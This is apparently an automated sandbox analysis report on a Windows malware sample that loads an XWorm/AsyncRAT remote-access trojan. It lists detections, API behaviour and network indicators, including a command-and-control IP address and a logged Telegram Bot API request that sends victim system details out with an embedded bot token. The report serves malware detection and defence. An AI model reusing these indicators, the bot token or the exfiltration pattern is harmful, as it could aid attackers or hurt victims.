Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr; Code function: 18_2_00353CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00353CE2
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\438799
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\438799\

                Networking

                Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:64431 -> 193.41.226.233:2222
                Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 193.41.226.233:2222 -> 192.168.2.4:64431
                Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:64431 -> 193.41.226.233:2222
                Source: Network traffic | Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:64427 -> 149.154.167.220:443
                Source: Malware configuration extractor | URLs: 193.41.226.233
                Source: unknown | DNS query: name: api.telegram.org
                Source: Yara match | File source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE
                Source: global traffic | TCP traffic: 192.168.2.4:64431 -> 193.41.226.233:2222
                Source: global traffic | HTTP traffic detected: GET /bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=6795213026&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3CE6FBAD6367EB17AE37%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20L9CBEH%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWORM%20v5.6 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                Source: Joe Sandbox View | IP Address: 149.154.167.220
                Source: Joe Sandbox View | ASN Name: TELEGRAMRU
                Source: Joe Sandbox View | ASN Name: AVORODE
                Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknown | TCP traffic detected without corresponding DNS query: 193.41.226.233 (reported 9 times)
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 3 times)
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EB29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile
                Source: global traffic | HTTP traffic detected: GET /bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=6795213026&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3CE6FBAD6367EB17AE37%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20L9CBEH%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWORM%20v5.6 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                Source: global traffic | DNS traffic detected: DNS query: nAtuEYczbaU.nAtuEYczbaU
                Source: global traffic | DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                Source: RegAsm.exe, 00000017.00000002.2973858744.000000000306C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
                Source: DA92phBHUS.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: DA92phBHUS.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                Source: DA92phBHUS.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                Source: DA92phBHUS.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                Source: DA92phBHUS.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                Source: DA92phBHUS.exe | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                Source: DA92phBHUS.exe | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                Source: DA92phBHUS.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: DA92phBHUS.exe | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                Source: DA92phBHUS.exe | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                Source: DA92phBHUS.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: DA92phBHUS.exe | String found in binary or memory: http://ocsp.digicert.com0C
                Source: DA92phBHUS.exe | String found in binary or memory: http://ocsp.digicert.com0N
                Source: DA92phBHUS.exe | String found in binary or memory: http://ocsp.digicert.com0O
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr | String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: RegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000000.1744485289.0000000000F09000.00000002.00000001.01000000.00000006.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, ImageSyncProX.scr, 00000012.00000002.1844874611.00000000003B9000.00000002.00000001.01000000.00000008.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: DA92phBHUS.exe | String found in binary or memory: http://www.digicert.com/CPS0
                Source: RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram
                Source: RegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                Source: Dump.pif, 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.2973858744.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
                Source: RegAsm.exe, 00000017.00000002.2973858744.000000000305B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=67952
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: DA92phBHUS.exe | String found in binary or memory: https://www.digicert.com/CPS0
                Source: Dump.pif.1.dr | String found in binary or memory: https://www.globalsign.com/repository/0
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000002.2973689735.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.1752932348.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Dump.pif, 0000000A.00000003.2617628768.000000000145B000.00000004.00000020.00020000.00000000.sdmp, Threat.0.dr, ImageSyncProX.scr.10.dr, Dump.pif.1.dr | String found in binary or memory: https://www.globalsign.com/repository/06
                Source: unknown | Network traffic detected: HTTP traffic on port 64427 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64427
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64427 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
                Source: C:\Users\user\Desktop\DA92phBHUS.exe | Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EB4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_00364830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EB4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                Source: C:\Users\user\Desktop\DA92phBHUS.exe | Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00ECD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_0037D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                Operating System Destruction

                Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe | Process information set: 01 00 00 00

                System Summary

                Source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
                Source: 10.3.Dump.pif.151caa0.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
                Source: 10.3.Dump.pif.151caa0.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
                Source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
                Source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
                Source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
                Source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
                Source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
                Source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
                Source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
                Source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
                Source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
                Source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
                Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js"
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00E60E38 CloseHandle,NtResumeThread
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EA42D5 CreateFileW,DeviceIoControl,CloseHandle
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00E98F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\DA92phBHUS.exe | Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EA5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_00355778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\DA92phBHUS.exe | File created: C:\Windows\BlogPs
                Source: C:\Users\user\Desktop\DA92phBHUS.exe | File created: C:\Windows\JamMerchant
                Source: C:\Users\user\Desktop\DA92phBHUS.exe | File created: C:\Windows\RespectiveSexual
                Source: C:\Users\user\Desktop\DA92phBHUS.exe | File created: C:\Windows\GeneticsFamiliar
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\438799\Dump.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: String function: 00301A36 appears 34 times
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: String function: 00318B30 appears 42 times
                Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scrCode function: String function: 00310D17 appears 70 times
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: String function: 00E51A36 appears 34 times
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: String function: 00E60D17 appears 70 times
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: String function: 00E68B30 appears 42 times
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: String function: 004062A3 appears 58 times
                Source: DA92phBHUS.exe, 00000000.00000002.1782767831.00000000007CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs DA92phBHUS.exe
                Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs DA92phBHUS.exe
                Source: DA92phBHUS.exe, 00000000.00000003.1778251668.00000000007CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs DA92phBHUS.exe
                Source: DA92phBHUS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.3.Dump.pif.151caa0.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.3.Dump.pif.151caa0.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@35/13@3/2
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00EAA6AD GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00E98DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif | Code function: 10_2_00E99399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_00348DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr | Code function: 18_2_00349399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
